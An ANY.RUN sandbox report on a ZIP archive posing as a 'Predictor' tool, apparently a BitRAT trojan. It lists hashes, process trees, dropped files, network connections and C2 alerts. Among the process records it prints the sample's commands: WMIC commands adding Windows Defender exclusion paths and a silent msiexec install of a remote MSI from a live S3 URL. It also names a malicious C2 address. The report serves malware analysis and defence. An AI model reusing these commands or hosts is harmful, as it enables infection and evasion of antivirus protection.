File name: Predictor.zip
Full analysis: https://app.any.run/tasks/cb155241-20d8-4544-b8fb-bc094c6b4a41
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links.

Analysis date: October 20, 2020, 13:45:25
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: trojan, bitrat, rat
Indicators:
MIME: application/zip
File info: Zip archive data, at least v1.0 to extract
MD5: DC8750DE25E8A8978564C563ABB3B4D9
SHA1: EE99A86A84BEAA9F9CEE8CB95AD91688327CC8C4
SHA256: 0A49C8402432452F05CE2FBF9014E2B0B6E3D065A6048725AF77DB57F0F24F57
SSDEEP: 393216:mZBLxYL1qTCXEAY9xFI2zoI8qbk4T0opRrZP:gPWEAY9xFdfhk94Rrx

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Application was dropped or rewritten from another process
      • Predictor v7.23.2.exe (PID: 3732)
      • QVhqPEnbQOXYtZf6.exe (PID: 3492)
      • Predictor v7.23.2.exe (PID: 2520)
      • rezaza.exe (PID: 2920)
    • Changes the autorun value in the registry
      • rezaza.exe (PID: 2920)
    • Connects to CnC server
      • rezaza.exe (PID: 2920)
    • BITRAT was detected
      • rezaza.exe (PID: 2920)
    • Uses Microsoft Installer as loader
      • Predictor v7.23.2.exe (PID: 2520)
    • Changes settings of System certificates
      • msiexec.exe (PID: 3412)
  • SUSPICIOUS
    • Executable content was dropped or overwritten
      • WinRAR.exe (PID: 1076)
      • msiexec.exe (PID: 3412)
      • rezaza.exe (PID: 2920)
      • expand.exe (PID: 3972)
    • Creates files in the Windows directory
      • expand.exe (PID: 3972)
    • Reads Internet Cache Settings
      • rezaza.exe (PID: 2920)
      • msiexec.exe (PID: 3412)
    • Starts CMD.EXE for commands execution
      • Predictor v7.23.2.exe (PID: 2520)
    • Adds / modifies Windows certificates
      • msiexec.exe (PID: 3412)
  • INFO
    • Application launched itself
      • msiexec.exe (PID: 3412)
No Malware configuration.

TRiD

.xpi | Mozilla Firefox browser extension (66.6)
.zip | ZIP compressed archive (33.3)

EXIF

ZIP

ZipFileName: Predictor/
ZipUncompressedSize: -
ZipCompressedSize: -
ZipCRC: 0x00000000
ZipModifyDate: 2020:10:18 00:43:14
ZipCompression: None
ZipBitFlag: -
ZipRequiredVersion: 10
Total processes: 55
Monitored processes: 13
Malicious processes: 3
Suspicious processes: 2


Process information

PID 1076 (parent: explorer.exe)
  CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Predictor.zip"
  Path: C:\Program Files\WinRAR\WinRAR.exe
  User: admin
  Company: Alexander Roshal
  Integrity Level: MEDIUM
  Description: WinRAR archiver
  Version: 5.60.0

PID 3732 (parent: WinRAR.exe)
  CMD: "C:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\Predictor v7.23.2.exe"
  Path: C:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\Predictor v7.23.2.exe
  User: admin
  Company: TODO: <Company name>
  Integrity Level: MEDIUM
  Description: Projectcalcule
  Exit code: 3221226540
  Version: 1.0.0.1

PID 2520 (parent: WinRAR.exe)
  CMD: "C:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\Predictor v7.23.2.exe"
  Path: C:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\Predictor v7.23.2.exe
  User: admin
  Company: TODO: <Company name>
  Integrity Level: HIGH
  Description: Projectcalcule
  Exit code: 0
  Version: 1.0.0.1

PID 2300 (parent: Predictor v7.23.2.exe)
  CMD: "C:\Windows\System32\wbem\WMIC.exe" /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\Users\admin\AppData\Local
  Path: C:\Windows\System32\wbem\WMIC.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: HIGH
  Description: WMI Commandline Utility
  Exit code: 2147749902
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 1880 (parent: Predictor v7.23.2.exe)
  CMD: "C:\Windows\System32\wbem\WMIC.exe" /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\Users\admin\AppData\Roaming
  Path: C:\Windows\System32\wbem\WMIC.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: HIGH
  Description: WMI Commandline Utility
  Exit code: 2147749902
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 3228 (parent: Predictor v7.23.2.exe)
  CMD: "C:\Windows\System32\msiexec.exe" /i https://plugsa.s3.eu-west-2.amazonaws.com/rezaza.msi /qn
  Path: C:\Windows\System32\msiexec.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: HIGH
  Description: Windows® installer
  Version: 5.0.7600.16385 (win7_rtm.090713-1255)

PID 3412 (parent: services.exe)
  CMD: C:\Windows\system32\msiexec.exe /V
  Path: C:\Windows\system32\msiexec.exe
  User: SYSTEM
  Company: Microsoft Corporation
  Integrity Level: SYSTEM
  Description: Windows® installer
  Version: 5.0.7600.16385 (win7_rtm.090713-1255)

PID 3600 (parent: msiexec.exe)
  CMD: C:\Windows\system32\MsiExec.exe -Embedding 5217B20031815CAA57EEF38E12B2D999
  Path: C:\Windows\system32\MsiExec.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: HIGH
  Description: Windows® installer
  Version: 5.0.7600.16385 (win7_rtm.090713-1255)

PID 3972 (parent: MsiExec.exe)
  CMD: "C:\Windows\System32\expand.exe" -R files.cab -F:* files
  Path: C:\Windows\System32\expand.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: HIGH
  Description: LZ Expansion Utility
  Exit code: 0
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 2920 (parent: MsiExec.exe)
  CMD: "C:\Users\admin\AppData\Local\Temp\MW-b779d397-3981-4fe0-9dd0-c3d013ec61a5\files\rezaza.exe"
  Path: C:\Users\admin\AppData\Local\Temp\MW-b779d397-3981-4fe0-9dd0-c3d013ec61a5\files\rezaza.exe
  User: admin
  Integrity Level: HIGH
Total events: 1 689
Read events: 1 602
Write events: 0
Delete events: 0
Modification events: No data

Executable files: 13
Suspicious files: 5
Text files: 84
Unknown types: 2

Dropped files

PID | Process | Filename | Type
1076 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\include\bytes_methods.h | text
MD5:D63054D05B04611AF3FE09695AA1A92C
SHA256:2DBFB55B484545B94247D1CE65702F1460ADC970EDCD0DD4A86B2957902728FB
1076 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\include\complexobject.h | text
MD5:FA93753FDBEFD8869D0EFE7EBC0E52A7
SHA256:581414618CD495C42A82C3F0AB1A4E3F10A294E2FB4BB1EFCFEB44BCD0EC3A42
1076 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\include\cobject.h | text
MD5:D6E7C73D1BC041419AF7D022C0380162
SHA256:D0101474D455F4875B51852518C7FCE359373708147936727697F2B0EC5764BE
1076 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\include\bytearrayobject.h | text
MD5:0310F1528CA7A9966680F95117EA487E
SHA256:400E6E276FC3FA823F29629FECFF302BD08D1ABB896FB500C4FAA334AA3293FD
1076 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\include\boolobject.h | text
MD5:DCC48FC557F8337D7BAA90E13D34B36A
SHA256:9483A995582F2DDAD6B47F85BB300371346CA10E846B923170D39E523815134F
1076 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\include\cellobject.h | text
MD5:BAA321AEBD7EF2A8D505C75B76F50BEC
SHA256:A277081668BC14F99518B3B7FBC8C8E1B98CC89BD3D1E6AB02D864ECE1209A9C
1076 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\include\codecs.h | text
MD5:E6925D7D994B61C347D437A5368B3701
SHA256:AFBBB487A45D9D9202D0FD6A1167CC8718B6EC3B2AFA758F1708FBFEC99ADF86
1076 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\AntiBusteds (2).dll | text
MD5:113F80EE3DC312A093CE9E89F95404FE
SHA256:8D3C4839E54881B05E93887868F5ACD25E4A1B40A2C21239BB028A20D801D301
1076 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\AntiBusteds (1).dll | text
MD5:113F80EE3DC312A093CE9E89F95404FE
SHA256:8D3C4839E54881B05E93887868F5ACD25E4A1B40A2C21239BB028A20D801D301
1076 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\include\datetime.h | text
MD5:958421EA055F38A3A54538A6C84795D5
SHA256:A80CA694DCCFE8EE65E3BBD2DFC57ADF2BE9464CA37EFE2B84471FF1FD61CDE7
HTTP(S) requests: 2
TCP/UDP connections: 4
DNS requests: 3
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
2920 | rezaza.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTuqL92L3tjkN67RNFF%2FEdvT6NEzAQUwBKyKHRoRmfpcCV0GgBFWwZ9XEQCEAdpsdVygbqahES8p3NLYzE%3D | US | der | 471 b | whitelisted
2920 | rezaza.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAGC%2BAmOouYmuRo7J4Qfua8%3D | US | der | 1.47 Kb | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
2920 | rezaza.exe | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted
2920 | rezaza.exe | 52.95.149.98:443 | drtus.s3.eu-west-2.amazonaws.com | Amazon.com, Inc. | GB | shared
2920 | rezaza.exe | 185.244.128.7:9944 | - | - | - | malicious
3412 | msiexec.exe | 52.95.150.26:443 | plugsa.s3.eu-west-2.amazonaws.com | Amazon.com, Inc. | GB | shared

DNS requests

Domain | IP | Reputation
plugsa.s3.eu-west-2.amazonaws.com | 52.95.150.26 | shared
drtus.s3.eu-west-2.amazonaws.com | 52.95.149.98 | shared
ocsp.digicert.com | 93.184.220.29 | whitelisted

Threats

PID | Process | Class | Message
2920 | rezaza.exe | A Network Trojan was detected | ET TROJAN Observed Malicious SSL Cert (BitRAT CnC)
No debug info